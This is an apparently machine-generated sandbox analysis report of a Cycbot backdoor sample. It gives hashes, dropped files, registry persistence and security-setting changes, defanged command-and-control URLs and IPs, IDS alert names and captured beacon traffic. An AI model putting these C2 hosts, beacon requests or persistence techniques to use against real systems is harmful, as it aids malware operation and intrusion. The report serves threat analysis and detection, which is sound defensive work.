Backdoor.Win32.Cycbot_71c3add065

by malwarelabrobot on April 1st, 2014 in Malware Descriptions.

Gen:Variant.Sirefef.642 (BitDefender), VirTool:Win32/Obfuscator.PS (Microsoft), HEUR:Trojan.Win32.Generic (Kaspersky), Trojan.Win32.Generic.pak!cobra (VIPRE), BackDoor.Gbot.1589 (DrWeb), Gen:Variant.Sirefef.642 (B) (Emsisoft), Artemis!71C3ADD065E8 (McAfee), Trojan.Gen.2 (Symantec), Backdoor.Win32.Agent (Ikarus), Gen:Heur.Conjar.3 (FSecure), Downloader.Generic12.BRK (AVG), Win32:Konar-B [Trj] (Avast), TROJ_SPNR.0BEE12 (TrendMicro), Gen:Variant.Sirefef.642 (AdAware), Trojan.Win32.Alureon.FD, Trojan.Win32.Ransom.FD, Trojan.Win32.Swrort.3.FD, BackdoorCycbot.YR (Lavasoft MAS)
Behaviour: Ransom, Trojan, Backdoor, VirTool


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Summary
Dynamic Analysis
Static Analysis
Network Activity
Map
Strings from Dumps
Removals

MD5: 71c3add065e8be550ba1d5834cf88851
SHA1: 66c294c5d1cbc1beb1934fa56e07256ce3be4cfc
SHA256: 94a7c82661a6ed5f403e1df78e956deec537e342392760493bb9bceff146f777
SSDeep: 12288:7NyWRiw6Ju8tF8uXirWgYEaJWgoXQQDYolKZG6SVT1ISJZKmBMwu fPAnmtcRWQj:hSu FJNgdglcHsSt94yamtcRWQgXh
Size: 980431 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2009-02-21 21:46:23
Analyzed on: WindowsXP SP3 32-bit


Summary:

Backdoor. Malware that enables a remote control of victim's machine.

Payload

No specific payload has been found.

Process activity

The Backdoor creates the following process(es):

%original file name%.exe:356
Clive Barker - Books Of Blood 03.exe:172
2 Gansta.exe:1372
3R2R.exe:788
3R2R.exe:204
B.tmp:328
ic5.exe:316

The Backdoor injects its code into the following process(es):

3R2R.exe:1728
Explorer.EXE:1644

File activity

The process %original file name%.exe:356 makes changes in the file system.
The Backdoor creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsp4.tmp\2 Gansta.exe (6656 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsp3.tmp (1009046 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsp4.tmp\3R2R.exe (290816 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsp4.tmp\Clive Barker - Books Of Blood 03.exe (530913 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsp4.tmp\ic5.exe (194048 bytes)

The Backdoor deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsp4.tmp\ic5.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsp4.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsp4.tmp\2 Gansta.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsp4.tmp\Clive Barker - Books Of Blood 03.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk2.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsp4.tmp\3R2R.exe (0 bytes)

The process Clive Barker - Books Of Blood 03.exe:172 makes changes in the file system.
The Backdoor creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)

The process 3R2R.exe:1728 makes changes in the file system.
The Backdoor creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Application Data\649C6\6249.49C (2301 bytes)
%System%\config\software.LOG (25600 bytes)
%Program Files%\LP\4566\B.tmp (102912 bytes)
%Program Files%\LP\4566\C29.exe (555008 bytes)
%Program Files%\LP\4566\C.exe (1389 bytes)
%System%\config\SOFTWARE (102400 bytes)
%System%\config (28672 bytes)

The Backdoor deletes the following file(s):

%Program Files%\LP\4566\C.exe (0 bytes)

Registry activity

The process %original file name%.exe:356 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "84 E3 13 70 E4 F9 EF 3B 90 C8 E4 A9 ED 92 53 E5"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\test\LOCALS~1\Temp\nsp4.tmp]
"ic5.exe" = "niBluse"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\test\LOCALS~1\Temp\nsp4.tmp]
"2 Gansta.exe" = "2 Gansta"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Документы"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Рабочий стол"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{91167d45-103d-11db-8c91-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{d8c0d8da-77bd-11e0-bb02-000c293bc0fd}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\test\LOCALS~1\Temp\nsp4.tmp]
"3R2R.exe" = "3R2R"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{91167d42-103d-11db-8c91-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Рабочий стол"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\test\LOCALS~1\Temp\nsp4.tmp]
"Clive Barker - Books Of Blood 03.exe" = "Clive Barker - Books Of Blood 03"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\Мои документы"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{ebcf8d94-66db-11de-b228-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\C:\DOCUME~1\test\LOCALS~1\Temp\nsp4.tmp\Clive Barker - Books Of Blood 03.exe,"

The Backdoor modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Backdoor modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

"UNCAsIntranet" = "1"

The Backdoor modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The process Clive Barker - Books Of Blood 03.exe:172 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65324"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65324"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{91167d45-103d-11db-8c91-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{91167d42-103d-11db-8c91-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65324"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 2F 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "31 2E 7E 18 C1 A3 8E 8F 7A 23 46 40 8C 32 66 89"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65324"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{d8c0d8da-77bd-11e0-bb02-000c293bc0fd}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{ebcf8d94-66db-11de-b228-806d6172696f}]
"BaseClass" = "Drive"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Backdoor deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process 2 Gansta.exe:1372 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "4D 39 40 93 EF DC 0E 1A 59 2D 3C 1B 9C 1F 47 7C"

The process 3R2R.exe:788 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "BB 65 EF A6 31 8D 69 89 F8 2F 7E 06 DB 98 C4 26"

The process 3R2R.exe:204 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "72 60 1F 43 29 C5 D4 3A 5F 91 A0 9C 32 A4 7D 2B"

The process 3R2R.exe:1728 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65324"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 30 00 00 00 03 00 00 00 14 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "1"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65324"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer" = "http=127.0.0.1:55192"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65324"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "37 15 F7 31 9E 2F 57 84 02 87 B7 06 CE 23 4A 10"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65324"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"DefaultConnectionSettings" = "3C 00 00 00 03 00 00 00 03 00 00 00 14 00 00 00"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

To automatically run itself each time Windows is booted, the Backdoor adds the following link to its file to the system registry autorun key:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"C29.exe" = "%Program Files%\LP\4566\C29.exe"

Automatic startup of the following service is disabled:

[HKLM\System\CurrentControlSet\Services\wscsvc]
"Start" = "3"

The Backdoor deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyOverride"

The process B.tmp:328 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A3 F2 E2 0B E2 A0 11 E5 ED 2C 48 49 0D 3B 01 51"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65324"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65324"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65324"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65324"

[HKCU\Software\WinRAR]
"HWID" = "7B 38 43 43 36 35 45 31 46 2D 31 34 45 43 2D 34"

The process ic5.exe:316 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "79 D5 C0 ED 4E D9 0D 64 E5 C7 53 81 30 A7 D9 C9"

Dropped PE files

MD5 File path
8950bca822967c72154e56665ba6f7f2 c:\Documents and Settings\test\Local Settings\Temp\nsp4.tmp\3R2R.exe
f51eba4d54233cfc975dd5d5c4bff62f c:\Documents and Settings\test\Local Settings\Temp\nsp4.tmp\Clive Barker - Books Of Blood 03.exe
ba4818120b8c3c87a4437450f5968ea5 c:\Program Files\LP\4566\B.tmp
8950bca822967c72154e56665ba6f7f2 c:\Program Files\LP\4566\C29.exe

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

No information is available.

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 4096 23458 23552 4.5133 2cec663f64ef38694dc96bb9f9cb766d
.rdata 28672 4496 4608 3.58909 db16645055619c0cc73276ff5c3adb75
.data 36864 3774424 1024 3.26654 b9d0aa986d9e766521436f5ad38cd7c5
.ndata 3813376 32768 0 0 d41d8cd98f00b204e9800998ecf8427e
.rsrc 3846144 80464 80896 3.42872 73f86a6245a543a96f576f96c83cda08

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

Total found: 15
88e9fc280f566e75b54ad356f19bc655
8d362f9ccc6926ac693a660a0af91558
5c2b08b64a1f09f9b988a8bc46a9e630
fcca222aa86ff5586b258e4580f8757e
0016eb10d89c1f2eb9db605eb3a5770e
b2f1f0fc8745c630fb810d6d26b57116
e89791dad855d0639b8c5c31e6fd005e
4b82f8d2fde575a88ca16e77cd0c4c8a
e9d9468da93f92772e13b83aa00b19c2
9a57f10967bea58fcb881af06488fdb9
d31927526523f51d6b3f2f925cd92b9f
3c617aa1780bc50e507331c1a02b19ac
3185a136400f3b49bfc84ac977657be3
a9e3cd512751f30e22028373237b9a27
2b067884974886daf24650507c0ea1c1

URLs

URL IP
hxxp://classicbattletech.com/lhous3.gif?pr=gwY92w4AcL4x7xCkvoknrnKGYDJULQxy1JhNaygpF7pd5oFfqvgCtiV9uNLuhiEf7TzHhAOUhSlngnyhTvxdyVy9qjsqTfUWh6uEesjLYYVXW1vwRvA/hLJO2LUPIRIgRG7N59HWSUgzFbkWM50wiLD24Nslq+JEx/Bpa9h+3PvFUi7asT24dcH/azc1gv+KrtpgpyaKvRpUrPZEaGug6H+wDDLFSsQ7mXa6OlZDii3pytod8aDviUQSaHigo9ndJG9AxeHv4KBLRDQs7Weu7LksJFILKpq7+C657kM 67.192.254.201
hxxp://rumperstumprs.com/logo.png?tq=gL5HtzoYwLzEpUb5fU3HxcW2B/06EsazybMRtyFZ0umG8Ar0SsSA/gSoSEU=&pr=41 208.73.211.182
hxxp://rumperstumprs.com/logo.png?tq=gHZutHoLpb2HdjbiNAjrpsSCJbO+V98lHA==&pr=41
hxxp://a26.ms.akamai.net/msdownload/update/v3/static/trustedr/en/authrootseq.txt
hxxp://a26.ms.akamai.net/msdownload/update/v3/static/trustedr/en/authrootstl.cab
hxxp://rumperstumprs.com/logo.png?tq=gKZEtzoYwLzEvUb5dQzRsrCqAvQlTca3l74EgC5OjrPGpgfib1XFp5zpRPksUt+A/gSoSEU=&pr=41
www.download.windowsupdate.com 92.123.155.155
ourdatatransfers.com 208.73.211.168
worldorderlive.com 208.73.211.182


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET TROJAN Bifrose/Cycbot Checkin 2
ET TROJAN Kazy/Kryptor/Cycbot Trojan Checkin 2
ET MALWARE Lowercase mozilla/2.0 User-Agent Likely Malware
ET TROJAN Trojan Generic - POST To gate.php with no referer
ET POLICY Unsupported/Fake Internet Explorer Version MSIE 5.
ET POLICY Windows 98 User-Agent Detected - Possible Malware or Non-Updated System

Traffic

GET /logo.png?tq=gL5HtzoYwLzEpUb5fU3HxcW2B/06EsazybMRtyFZ0umG8Ar0SsSA/gSoSEU=&pr=41 HTTP/1.0
Host: rumperstumprs.com
User-Agent: mozilla/2.0
Connection: close


HTTP/1.0 200 (OK)
Cache-Control: private, no-cache, must-revalidate
Connection: Keep-Alive
Pragma: no-cache
Server: Oversee Turing v1.0.0
Content-Length: 1397
Content-Type: text/html
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Keep-Alive: timeout=3, max=99
P3P: policyref="hXXp://VVV.dsparking.com/w3c/p3p.xml", CP="NOI DSP COR ADMa OUR NOR STA"
Set-Cookie: parkinglot=1; domain=.rumperstumprs.com; path=/; expires=Sun, 30-Mar-2014 01:55:27 GMT
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN" "hXXp://
VVV.w3.org/TR/html4/frameset.dtd">.<!-- turing_cluster_prod --&g
t;.<html>.  <head>.    <meta http-equiv="Content-Type" 
content="text/html; charset=utf-8" />..    <title>rumperstump
rs.com</title>.    <meta name="keywords" content="rumperstump
rs.com" />.    <meta name="description" content="rumperstumprs.c
om" />.    <meta name="robots" content="index, follow" />.   
 <meta name="revisit-after" content="10" />...    <meta name=
"viewport" content="width=device-width, initial-scale=1.0" /> ...  
  .    <script type="text/javascript">.      document.cookie = "
jsc=1";.    </script>..  </head>.  <frameset rows="100%
,*" frameborder="no" border="0" framespacing="0">.    <frame src
="hXXp://rumperstumprs.com?epl=Um-PUwFiC-Sjz-PPzH2yLY_DgD6QUDhFchc_PXE
0SX41BrMEUsSCNVOIex7BjqqNPGA0EMuVENcd1pL0Qr-p_40CWzjMc9NAHQcK-Gy4kkQXE
2dCUaGhmDA5ApZONHkNNTE2LhDKiVM8oXMzGgAamgYNmUQJkN5kgqYeMuonNfJTNWQAIJD
er78AAOB_AQAAQIDbCgAAj8OAPllTJllBMTZoWkKbAAAA8A" name="rumperstumprs.c
om">.  </frameset>.  <noframes>..<body><a href
="hXXp://rumperstumprs.com?epl=Um-PUwFiC-Sjz-PPzH2yLY_DgD6QUDhFchc_PXE
0SX41BrMEUsSCNVOIex7BjqqNPGA0EMuVENcd1pL0Qr-p_40CWzjMc9NAHQcK-Gy4kkQXE
2dCUaGhmDA5ApZONHkNNTE2LhDKiVM8oXMzGgAamgYNmUQJkN5kgqYeMuonNfJTNWQAIJD
er78AAOB_AQAAQIDbCgAAj8OAPllTJllBMTZoWkKbAAAA8A">Click here to go t
o rumperstumprs.com</a>.</body>.  </noframes>.&l
<<< skipped >>>


GET /logo.png?tq=gKZEtzoYwLzEvUb5dQzRsrCqAvQlTca3l74EgC5OjrPGpgfib1XFp5zpRPksUt+A/gSoSEU=&pr=41 HTTP/1.0
Connection: close
Host: rumperstumprs.com
Accept: */*
User-Agent: chrome/9.0


HTTP/1.0 200 (OK)
Cache-Control: private, no-cache, must-revalidate
Connection: Keep-Alive
Pragma: no-cache
Server: Oversee Turing v1.0.0
Content-Length: 1397
Content-Type: text/html
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Keep-Alive: timeout=3, max=87
P3P: policyref="hXXp://VVV.dsparking.com/w3c/p3p.xml", CP="NOI DSP COR ADMa OUR NOR STA"
Set-Cookie: parkinglot=1; domain=.rumperstumprs.com; path=/; expires=Sun, 30-Mar-2014 01:56:03 GMT
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN" "hXXp://
VVV.w3.org/TR/html4/frameset.dtd">.<!-- turing_cluster_prod --&g
t;.<html>.  <head>.    <meta http-equiv="Content-Type" 
content="text/html; charset=utf-8" />..    <title>rumperstump
rs.com</title>.    <meta name="keywords" content="rumperstump
rs.com" />.    <meta name="description" content="rumperstumprs.c
om" />.    <meta name="robots" content="index, follow" />.   
 <meta name="revisit-after" content="10" />...    <meta name=
"viewport" content="width=device-width, initial-scale=1.0" /> ...  
  .    <script type="text/javascript">.      document.cookie = "
jsc=1";.    </script>..  </head>.  <frameset rows="100%
,*" frameborder="no" border="0" framespacing="0">.    <frame src
="hXXp://rumperstumprs.com?epl=ksIUvJD7ZzYeCCwMRaLwOIA0VBQ3JBROkdzFT08
cTZJfjcEsgRSxYM0U4p5HsKNqIw8YDcx6CfP655aeaOwmxc9RiAuGKjnJ7DBYTLvlHZCgl
noU4dQOitRZbKRBbB-VEjVDbt3NRKjTM2f3KaUBoKFp0JBJlDCSfoSJYKboUZNNNWQAIJD
er78AAOB_AQAAQIDbCgAA0lBR3FlTJllBMTZoWkKbAAAA8A" name="rumperstumprs.c
om">.  </frameset>.  <noframes>..<body><a href
="hXXp://rumperstumprs.com?epl=ksIUvJD7ZzYeCCwMRaLwOIA0VBQ3JBROkdzFT08
cTZJfjcEsgRSxYM0U4p5HsKNqIw8YDcx6CfP655aeaOwmxc9RiAuGKjnJ7DBYTLvlHZCgl
noU4dQOitRZbKRBbB-VEjVDbt3NRKjTM2f3KaUBoKFp0JBJlDCSfoSJYKboUZNNNWQAIJD
er78AAOB_AQAAQIDbCgAA0lBR3FlTJllBMTZoWkKbAAAA8A">Click here to go t
o rumperstumprs.com</a>.</body>.  </noframes>.&l
<<< skipped >>>


GET /lhous3.gif?pr=gwY92w4AcL4x7xCkvoknrnKGYDJULQxy1JhNaygpF7pd5oFfqvgCtiV9uNLuhiEf7TzHhAOUhSlngnyhTvxdyVy9qjsqTfUWh6uEesjLYYVXW1vwRvA/hLJO2LUPIRIgRG7N59HWSUgzFbkWM50wiLD24Nslq+JEx/Bpa9h+3PvFUi7asT24dcH/azc1gv+KrtpgpyaKvRpUrPZEaGug6H+wDDLFSsQ7mXa6OlZDii3pytod8aDviUQSaHigo9ndJG9AxeHv4KBLRDQs7Weu7LksJFILKpq7+C657kM HTTP/1.0
Connection: close
Host: classicbattletech.com
Accept: */*
User-Agent: chrome/9.0


HTTP/1.1 301 Moved Permanently
Date: Sat, 29 Mar 2014 01:55:23 GMT
Server: Apache
Location: hXXp://bg.battletech.com/lhous3.gif?pr=gwY92w4AcL4x7xCkvoknrnKGYDJULQxy1JhNaygpF7pd5oFfqvgCtiV9uNLuhiEf7TzHhAOUhSlngnyhTvxdyVy9qjsqTfUWh6uEesjLYYVXW1vwRvA/hLJO2LUPIRIgRG7N59HWSUgzFbkWM50wiLD24Nslq+JEx/Bpa9h+3PvFUi7asT24dcH/azc1gv+KrtpgpyaKvRpUrPZEaGug6H+wDDLFSsQ7mXa6OlZDii3pytod8aDviUQSaHigo9ndJG9AxeHv4KBLRDQs7Weu7LksJFILKpq7+C657kM
Content-Length: 629
Connection: close
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html>&
lt;head>.<title>301 Moved Permanently</title>.</head
><body>.<h1>Moved Permanently</h1>.<p>The d
ocument has moved <a href="hXXp://bg.battletech.com/lhous3.gif?pr=g
wY92w4AcL4x7xCkvoknrnKGYDJULQxy1JhNaygpF7pd5oFfqvgCtiV9uNLuhiEf7TzHhAO
UhSlngnyhTvxdyVy9qjsqTfUWh6uEesjLYYVXW1vwRvA/hLJO2LUPIRIgRG7N59HWSUg
zFbkWM50wiLD24Nslq+JEx/Bpa9h+3PvFUi7asT24dcH/azc1gv+Krtpgpya
KvRpUrPZEaGug6H+wDDLFSsQ7mXa6OlZDii3pytod8aDviUQSaHigo9ndJG9AxeHv4KB
LRDQs7Weu7LksJFILKpq7+C657kM">here</a>.</p>.<hr>
;.<address>Apache Server at classicbattletech.com Port 80</ad
dress>.</body></html>...



GET /msdownload/update/v3/static/trustedr/en/authrootstl.cab HTTP/1.1
Connection: close
Accept: */*
User-Agent: Microsoft-CryptoAPI/5.131.2600.5512
Host: VVV.download.windowsupdate.com
Pragma: no-cache


HTTP/1.1 200 OK
Content-Type: application/octet-stream
Last-Modified: Wed, 12 Mar 2014 20:20:10 GMT
Accept-Ranges: bytes
ETag: "0b96c77303ecf1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Content-Length: 54007
Cache-Control: max-age=6822
